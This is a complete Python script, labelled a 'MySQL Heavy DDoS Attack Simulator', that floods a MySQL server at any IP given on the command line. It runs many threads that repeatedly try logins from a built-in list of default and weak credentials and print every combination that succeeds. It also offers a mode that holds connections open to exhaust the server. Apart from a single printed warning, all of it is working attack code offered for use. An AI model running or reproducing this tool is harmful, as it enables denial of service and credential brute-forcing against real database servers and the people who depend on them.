#!/usr/bin/env python3 """ MySQL Heavy DDoS Attack Simulator Usage: python3 mysql_ddos.py [port] [duration] [threads] """ import mysql.connector import threading import time import sys import random class MySQLHeavyAttack: def __init__(self, target_ip, target_port=3306): self.target_ip = target_ip self.target_port = target_port self.attempts = 0 self.successes = 0 self.start_time = None # Extensive credential list for maximum attempts self.credentials = [ # Root variations ("root", "password"), ("root", "123456"), ("root", "root"), ("root", ""), ("root", "toor"), ("root", "admin"), ("root", "default"), ("root", "pass"), ("root", "1234"), ("root", "mysql"), ("root", "root123"), ("root", "Password"), ("root", "Password1"), ("root", "Password123"), ("root", "qwerty"), # Admin variations ("admin", "admin"), ("admin", "password"), ("admin", "123456"), ("admin", "admin123"), ("admin", "Administrator"), ("admin", "pass"), ("admin", ""), ("admin", "default"), ("admin", "test"), # Common users ("test", "test"), ("test", "123456"), ("test", "password"), ("mysql", "mysql"), ("mysql", "password"), ("mysql", "123456"), ("user", "user"), ("user", "password"), ("user", "123456"), ("backup", "backup"), ("backup", "password"), ("web", "web"), ("web", "password"), ("db", "db"), ("db", "password"), ("sql", "sql"), ("sql", "password"), # Empty and simple ("", ""), ("guest", "guest"), ("demo", "demo"), ("oracle", "oracle"), ("postgres", "postgres"), # Number sequences ("root", "123"), ("root", "1234"), ("root", "12345"), ("root", "1234567"), ("root", "12345678"), ("root", "123456789"), ("admin", "123"), ("admin", "1234"), ("admin", "12345"), ] def ultra_cpu_attack(self, duration=30, max_threads=100): """Maximum CPU intensive attack with SSL""" print(f"๐Ÿ’€ ULTRA CPU INTENSIVE ATTACK") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print(f"โฐ Duration: {duration}s | ๐Ÿงต Threads: {max_threads}") print("=" * 60) self.attempts = 0 self.successes = 0 self.start_time = time.time() stop_flag = threading.Event() def cpu_attacker(thread_id): while not stop_flag.is_set(): # Use different credentials each time user, pwd = random.choice(self.credentials) try: # Force connection with various parameters for max CPU conn = mysql.connector.connect( host=self.target_ip, port=self.target_port, user=user, password=pwd, connection_timeout=2, connect_timeout=2, # These add more CPU load use_pure=True, # Pure Python implementation buffered=True, # Use more memory compress=True, # Add compression overhead ) self.successes += 1 print(f"๐Ÿ”ฅ SUCCESS - Thread {thread_id}: {user}:{pwd}") conn.close() except mysql.connector.Error as e: if "SSL" in str(e): # Try without SSL if SSL fails try: conn = mysql.connector.connect( host=self.target_ip, port=self.target_port, user=user, password=pwd, connection_timeout=1, use_pure=False, # C extension might be faster ) self.successes += 1 print(f"๐Ÿ”ฅ SUCCESS (No SSL) - Thread {thread_id}: {user}:{pwd}") conn.close() except: pass except: pass finally: self.attempts += 1 # Start attack threads threads = [] for i in range(max_threads): t = threading.Thread(target=cpu_attacker, args=(i,)) t.daemon = True threads.append(t) t.start() # Progress monitoring last_attempts = 0 while time.time() - self.start_time < duration: elapsed = time.time() - self.start_time current_attempts = self.attempts # Calculate attempts per second aps = current_attempts / elapsed if elapsed > 0 else 0 success_rate = (self.successes / current_attempts * 100) if current_attempts > 0 else 0 print(f"\rโฐ {elapsed:.1f}s | ๐Ÿ”ฅ {current_attempts} attempts | ๐Ÿ“ˆ {aps:.1f}/sec | โœ… {self.successes} success | ๐Ÿ“Š {success_rate:.1f}%", end="") time.sleep(0.5) stop_flag.set() time.sleep(1) # Let threads finish self.print_final_stats() def memory_connection_attack(self, duration=20, max_threads=80): """Attack that consumes both CPU and memory by holding connections""" print(f"\n๐Ÿง  MEMORY & CONNECTION ATTACK") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print(f"โฐ Duration: {duration}s | ๐Ÿงต Threads: {max_threads}") print("=" * 60) self.attempts = 0 self.successes = 0 self.start_time = time.time() active_connections = [] connection_lock = threading.Lock() def memory_attacker(thread_id): nonlocal active_connections while time.time() - self.start_time < duration: user, pwd = random.choice(self.credentials) try: conn = mysql.connector.connect( host=self.target_ip, port=self.target_port, user=user, password=pwd, connection_timeout=3, buffered=True ) with connection_lock: self.successes += 1 active_connections.append(conn) print(f"๐Ÿ”— CONNECTION HELD - Thread {thread_id}: {user}:{pwd}") # Hold connection for a random time (1-5 seconds) hold_time = random.uniform(1, 5) time.sleep(hold_time) with connection_lock: if conn in active_connections: conn.close() active_connections.remove(conn) except Exception as e: pass finally: self.attempts += 1 # Start attackers threads = [] for i in range(max_threads): t = threading.Thread(target=memory_attacker, args=(i,)) t.daemon = True threads.append(t) t.start() # Monitor while time.time() - self.start_time < duration: elapsed = time.time() - self.start_time aps = self.attempts / elapsed if elapsed > 0 else 0 with connection_lock: active_count = len(active_connections) print(f"\rโฐ {elapsed:.1f}s | ๐Ÿ”ฅ {self.attempts} attempts | ๐Ÿ“ˆ {aps:.1f}/sec | ๐Ÿ”— {active_count} active connections", end="") time.sleep(0.5) # Cleanup any remaining connections with connection_lock: for conn in active_connections: try: conn.close() except: pass active_connections.clear() time.sleep(2) self.print_final_stats() def mixed_attack(self, duration=40): """Combined attack using multiple methods""" print(f"\n๐Ÿ’€ MIXED FULL-SPECTRUM ATTACK") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print(f"โฐ Duration: {duration}s") print("=" * 60) # Run different attack types in parallel attack1 = threading.Thread(target=lambda: self.ultra_cpu_attack(duration//2, 60)) attack2 = threading.Thread(target=lambda: self.memory_connection_attack(duration//2, 40)) attack1.daemon = True attack2.daemon = True attack1.start() attack2.start() # Wait for completion attack1.join() attack2.join() def print_final_stats(self): """Print final attack statistics""" total_time = time.time() - self.start_time aps = self.attempts / total_time if total_time > 0 else 0 success_rate = (self.successes / self.attempts * 100) if self.attempts > 0 else 0 print(f"\n" + "=" * 60) print(f"๐ŸŽฏ ATTACK COMPLETE") print(f"โฑ๏ธ Total Time: {total_time:.1f}s") print(f"๐Ÿ’ฃ Total Attempts: {self.attempts}") print(f"โœ… Successful Logins: {self.successes}") print(f"๐Ÿ“ˆ Attempts/Second: {aps:.1f}") print(f"๐Ÿ“Š Success Rate: {success_rate:.2f}%") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print("=" * 60) def main(): if len(sys.argv) < 2: print("๐Ÿš€ MySQL Heavy DDoS Attack Simulator") print("Usage: python3 mysql_ddos.py [port] [duration] [threads]") print("\nExamples:") print(" python3 mysql_ddos.py 192.168.1.100") print(" python3 mysql_ddos.py 192.168.1.100 3306 30 100") print(" python3 mysql_ddos.py 10.0.0.5 3306 60 150") sys.exit(1) # Parse command line arguments target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 3306 duration = int(sys.argv[3]) if len(sys.argv) > 3 else 30 threads = int(sys.argv[4]) if len(sys.argv) > 4 else 100 print("๐Ÿš€ STARTING MYSQL HEAVY DDoS ATTACK SIMULATOR") print("โš ๏ธ WARNING: Only use on your own servers!") print("=" * 60) attacker = MySQLHeavyAttack(target_ip, target_port) try: # Run the heaviest attack attacker.ultra_cpu_attack(duration=duration, max_threads=threads) # Uncomment for even heavier attacks: # attacker.memory_connection_attack(duration=duration//2, max_threads=threads//2) # attacker.mixed_attack(duration=duration) except KeyboardInterrupt: print("\n\nโน๏ธ Attack interrupted by user") except Exception as e: print(f"\nโŒ Error: {e}") if __name__ == "__main__": main()